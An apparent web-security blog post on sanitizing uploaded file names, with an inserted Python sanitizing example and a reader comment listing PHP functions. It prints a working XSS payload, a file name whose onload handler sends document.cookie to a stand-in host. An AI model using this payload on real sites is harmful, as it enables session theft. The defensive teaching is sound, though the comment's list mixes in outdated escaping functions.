Last Updated: February 25, 2016
nmalcolm

Web Security: File Names

One important thing to remember when developing web applications is that you can never trust your users, under any circumstances. Humans are cruel; it is not unlikely that someone will try to crawl their way into your server or database.

When developing attachment, file upload, or similar systems, always remember to sanitize the file name.

Of course, modern operating systems don't allow slashes in file names, so the following wouldn't work (the closing tag needs a slash):

<body>hacked</body>.txt

Systems just don't like that; you cannot use slashes in file names. But a file with a specially crafted name that needs no slash at all can still be uploaded, and once that name is echoed into a page unescaped it can be used to steal cookies, redirect users, or modify the current page to the attacker's liking.

Examples:

// Simple alert
<body onload=alert(Hacked)>.txt

// Cookie stealer
<body onload=location.href="http:"+String.fromCharCode(47)+String.fromCharCode(47)+"localhost"+String.fromCharCode(47)+"test.php?data="+escape(document.cookie)>.txt

// etc

ALWAYS sanitize the file name. Keep yourself and your users safe. :)
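One way to apply the advice above, as an added example that is not code from the original post: reduce every uploaded name to a safe basename before storing it (no directory parts, no markup characters, no leading dots), and HTML-escape whatever name is later shown in a page. The sample names, the `sanitize_filename` and `render_listing` helpers, and the `upload` fallback name are all constructed for this illustration.

```python
import html
import re
import unicodedata

# Constructed sample upload names (illustration only, not from the original post).
SAMPLE_NAMES = [
    "report.txt",
    "<body onload=alert(1)>.txt",
    "../../etc/passwd",
    "..\\..\\windows\\win.ini",
    "",
    ".htaccess",
    "résumé final.pdf",
]

# Anything outside this conservative allow-list is replaced with '_'.
DISALLOWED = re.compile(r"[^A-Za-z0-9._-]")
MAX_LEN = 100


def sanitize_filename(name: str, fallback: str = "upload") -> str:
    """Reduce an untrusted upload name to a safe basename.

    - keeps only the last path component (both / and \\ are treated as separators)
    - normalizes Unicode and drops non-ASCII so look-alike characters cannot slip through
    - replaces every character outside [A-Za-z0-9._-] with '_'
    - strips leading dots so the result is never a dotfile or '..'
    - returns a fixed fallback name when nothing usable is left
    """
    base = re.split(r"[\\/]", name)[-1]
    base = unicodedata.normalize("NFKD", base).encode("ascii", "ignore").decode()
    base = DISALLOWED.sub("_", base)
    base = base.lstrip(".")
    base = base[:MAX_LEN]
    if not base or base.strip("._") == "":
        return fallback
    return base


def render_listing(display_name: str) -> str:
    """Output-encode a name for an HTML context.

    This is the control that defuses the onload payloads in the post even when
    the original name is kept for display: the tag brackets become entities and
    the browser never sees a <body> element.
    """
    return "<li>%s</li>" % html.escape(display_name, quote=True)


if __name__ == "__main__":
    for raw in SAMPLE_NAMES:
        print("%-40r stored as %-30r shown as %s"
              % (raw, sanitize_filename(raw), render_listing(raw)))
```

Storing the sanitized name and escaping on output are independent controls; the first protects the filesystem (no traversal, no dotfiles), the second protects the browser, and a real upload handler should do both.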


1 Response


I couldn't agree more with you, I wish I had mentioned this in my Pro Tip about sanitizing variables.

The only thing I can add is HOW:

a) htmlspecialchars()
b) strip_tags()
c) stripslashes() / addslashes()
d) mysql_real_escape_string()
e) htmlentities()
And to be honest, hundreds more methods of sanitizing data.

Awesome post.
